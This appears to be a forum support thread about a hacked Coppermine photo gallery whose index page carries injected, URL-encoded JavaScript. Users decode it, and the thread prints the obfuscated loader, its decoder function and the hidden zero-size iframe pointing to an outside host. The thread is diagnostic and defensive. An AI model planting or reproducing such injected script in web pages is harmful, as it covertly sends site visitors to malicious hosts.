Print

[maolu]

I noticed it yesterday.

When i open coppermine's index page, it connects to some other url, something like http://www.carambadeus.com/.
Today i also noticed that browsing my gallery with firefox, it asks me for Java Runtine Environment in order to "properly view the page"...

Is this normal?!?!

[Joachim Müller]

post a link to your site, how else could we tell?

[maolu]

oks

www.maolu.it/gallery

[maolu]

!!!

i found that on top of my page there is THIS:

Code: [Select]

<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')
</script>
This is javascript code i can't find in any of the files of coppermine, i cannot understand where is it coming from and i'm sure now that this is the reason of the strange request for Java Runtime Environment!!!

[Tranz]

Worked fine for me. Maybe it's something to do with your computer.

[Nibbler]

You need to kill that js, it's opening an iframe to somewhere.

[maolu]

You need to kill that js, it's opening an iframe to somewhere.

I know but it's NOT related to my files!
I never put any js into any page...
I suppose it's something with my internet provider, i just wrote them, i hope they'll answer as soon as possible!!!

[kegobeer]

Well, whoever put that crap on your site got it from here:

http://scriptasylum.com/tutorials/encdec/encode-decode.html

The code is copied verbatim from that website.  Here's what is actually put on your page:

Code: [Select]

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

Code: [Select]

dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')
So, the function dF(s) unescapes whatever string is in dF('...').  This is contained in dF:

Code: [Select]

<iframe src=http://traf.sn-net.info/index.php frameborder=0 width=0 height=0 scrolling=no name=counter></iframe>
More of the same crap is on that website, pretty much causing a repeating loop to the same websites over and over.  Definitely up to no good.

[maolu]

I received a mail from my provider...

They say that probably there has been some sort of hackering over my site and the way to solve it is to change the CHMOD of the coppermine's dir in order to prevent web users to enter.

I think they're crazy because thousand of people use html uploads without this kind of problems!!!
I'm waiting for an answer from them....

[kegobeer]

If you allow other than images, you can cause yourself a bit of grief.  You might want to approve all images before they are viewable - this way you can verify what's been uploaded and delete any odd files.

[Joachim Müller]

what filetypes do you allow to be uploaded? Never ever allow htm, html, js, asp, php, php3. In fact you should allow pics and that's it. Yes, your site has been hacked. You'll have to find out where the attacker entered: was it a gap you have opened up deliberately, or did they come in through some kind of backdoor (vulnerability).

[maolu]

I asked my internet provider for this and they say there has been an intusion on their server.

By now they still don't know how it happenend....